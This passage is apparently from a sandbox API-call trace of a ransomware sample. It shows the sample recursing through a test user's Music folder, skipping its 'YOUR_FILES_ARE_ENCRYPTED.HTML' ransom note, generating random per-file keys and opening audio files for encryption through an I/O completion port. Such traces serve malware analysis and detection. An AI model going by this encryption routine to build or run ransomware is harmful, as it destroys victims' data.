lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\EDgkOwoCzVQ1piLO.wav" [0167.747] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.747] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.750] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd97c0010, ftCreationTime.dwHighDateTime=0x1d7dba8, ftLastAccessTime.dwLowDateTime=0x6b8bc430, ftLastAccessTime.dwHighDateTime=0x1d7e582, ftLastWriteTime.dwLowDateTime=0x6b8bc430, ftLastWriteTime.dwHighDateTime=0x1d7e582, nFileSizeHigh=0x0, nFileSizeLow=0x18a85, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="HVm1M33x_lC.wav", cAlternateFileName="HVM1M3~1.WAV")) returned 1 [0167.754] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav") returned 45 [0167.754] lstrcmpW (lpString1="HVm1M33x_lC.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.754] PathFindExtensionW (pszPath="HVm1M33x_lC.wav") returned=".wav" [0167.754] lstrlenW (lpString=".wav") returned 4 [0167.754] PathFindExtensionW (pszPath="HVm1M33x_lC.wav") returned=".wav" [0167.754] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\hvm1m33x_lc.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.754] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=100997) returned 1 [0167.754] GetProcessHeap () returned 0x270000 [0167.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.755] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="60") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="9D") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="2D") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="AA") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="52") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="4E") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5B") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="55") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="D1") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="98") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="F8") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="A5") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="09") returned 2 [0167.755] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6B") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="AA") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="D7") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8B") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="0C") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="E8") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="9B") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="07") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CF") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="1E") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="2C") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="17") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="04") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="C3") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="07") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="85") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1A") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="AE") returned 2 [0167.756] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="23") returned 2 [0167.757] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\HVm1M33x_lC.wav" [0167.757] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.757] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.760] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a4fdbc0, ftCreationTime.dwHighDateTime=0x1d7e416, ftLastAccessTime.dwLowDateTime=0xe3aff470, ftLastAccessTime.dwHighDateTime=0x1d7e4b2, ftLastWriteTime.dwLowDateTime=0xe3aff470, ftLastWriteTime.dwHighDateTime=0x1d7e4b2, nFileSizeHigh=0x0, nFileSizeLow=0xadca, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="PpOtp7J97-dM4YBP.wav", cAlternateFileName="PPOTP7~1.WAV")) returned 1 [0167.760] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav") returned 50 [0167.760] lstrcmpW (lpString1="PpOtp7J97-dM4YBP.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.760] PathFindExtensionW (pszPath="PpOtp7J97-dM4YBP.wav") returned=".wav" [0167.761] lstrlenW (lpString=".wav") returned 4 [0167.761] PathFindExtensionW (pszPath="PpOtp7J97-dM4YBP.wav") returned=".wav" [0167.761] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\ppotp7j97-dm4ybp.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.764] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=44490) returned 1 [0167.764] GetProcessHeap () returned 0x270000 [0167.764] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.765] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="E5") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="C9") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="C3") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="3F") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F4") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="50") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="FF") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="2F") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4D") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="F8") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="2A") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="3C") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="F6") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="75") returned 2 [0167.765] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="31") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="9D") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="AE") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="9E") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7B") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="4B") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="D5") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="98") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="26") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="B4") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="AB") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="F5") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="DC") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="71") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="6B") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="39") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="C7") returned 2 [0167.766] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="57") returned 2 [0167.766] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\PpOtp7J97-dM4YBP.wav" [0167.767] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.767] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e0f91c0, ftCreationTime.dwHighDateTime=0x1d7da72, ftLastAccessTime.dwLowDateTime=0xf825a360, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xf825a360, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="qeMPPB6d", cAlternateFileName="")) returned 1 [0167.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d") returned 38 [0167.779] GetProcessHeap () returned 0x270000 [0167.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0167.780] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d" [0167.780] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\*" [0167.780] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e0f91c0, ftCreationTime.dwHighDateTime=0x1d7da72, ftLastAccessTime.dwLowDateTime=0xf825a360, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xf825a360, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0167.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e0f91c0, ftCreationTime.dwHighDateTime=0x1d7da72, ftLastAccessTime.dwLowDateTime=0xf825a360, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xf825a360, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.780] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c6ff0, ftCreationTime.dwHighDateTime=0x1d7dae2, ftLastAccessTime.dwLowDateTime=0x64e7e6b0, ftLastAccessTime.dwHighDateTime=0x1d7df31, ftLastWriteTime.dwLowDateTime=0x64e7e6b0, ftLastWriteTime.dwHighDateTime=0x1d7df31, nFileSizeHigh=0x0, nFileSizeLow=0x17888, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="-klD7FnnV0Wcc3teosZX.m4a", cAlternateFileName="-KLD7F~1.M4A")) returned 1 [0167.780] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a") returned 63 [0167.780] lstrcmpW (lpString1="-klD7FnnV0Wcc3teosZX.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.780] PathFindExtensionW (pszPath="-klD7FnnV0Wcc3teosZX.m4a") returned=".m4a" [0167.781] lstrlenW (lpString=".m4a") returned 4 [0167.781] PathFindExtensionW (pszPath="-klD7FnnV0Wcc3teosZX.m4a") returned=".m4a" [0167.781] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\-kld7fnnv0wcc3teoszx.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.781] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=96392) returned 1 [0167.781] GetProcessHeap () returned 0x270000 [0167.781] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.782] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4B") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="97") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="30") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="BD") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="83") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="6F") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="7B") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="06") returned 2 [0167.782] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="11") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="DF") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="66") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="44") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="EC") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="69") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5F") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="1C") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="ED") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="67") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="67") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E6") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="1E") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="55") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="19") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="19") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="71") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E9") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5A") returned 2 [0167.783] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7F") returned 2 [0167.784] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a" [0167.784] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.784] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.792] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba83d30, ftCreationTime.dwHighDateTime=0x1d7df78, ftLastAccessTime.dwLowDateTime=0x6f3a75e0, ftLastAccessTime.dwHighDateTime=0x1d7e5e6, ftLastWriteTime.dwLowDateTime=0x6f3a75e0, ftLastWriteTime.dwHighDateTime=0x1d7e5e6, nFileSizeHigh=0x0, nFileSizeLow=0x1009d, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="cGzXHwX.wav", cAlternateFileName="")) returned 1 [0167.792] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav") returned 50 [0167.792] lstrcmpW (lpString1="cGzXHwX.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.792] PathFindExtensionW (pszPath="cGzXHwX.wav") returned=".wav" [0167.792] lstrlenW (lpString=".wav") returned 4 [0167.793] PathFindExtensionW (pszPath="cGzXHwX.wav") returned=".wav" [0167.793] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\cgzxhwx.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.793] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=65693) returned 1 [0167.793] GetProcessHeap () returned 0x270000 [0167.793] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.794] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="48") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0C") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="5F") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F6") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="12") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="AE") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A5") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C5") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="12") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="0B") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="71") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="FB") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7B") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="33") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="24") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="B8") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="28") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="09") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="85") returned 2 [0167.794] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="EE") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DF") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D7") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="76") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="CD") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="30") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EE") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="96") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E2") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C0") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="71") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1B") returned 2 [0167.795] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5E") returned 2 [0167.795] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav" [0167.795] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.795] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.799] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bfcf70, ftCreationTime.dwHighDateTime=0x1d7de2e, ftLastAccessTime.dwLowDateTime=0x50b96630, ftLastAccessTime.dwHighDateTime=0x1d7de70, ftLastWriteTime.dwLowDateTime=0x50b96630, ftLastWriteTime.dwHighDateTime=0x1d7de70, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="DXCJlNP3q", cAlternateFileName="DXCJLN~1")) returned 1 [0167.803] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q") returned 48 [0167.803] GetProcessHeap () returned 0x270000 [0167.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76302f8 [0167.804] lstrcpyW (in: lpString1=0x76302f8, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q" [0167.804] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\*") 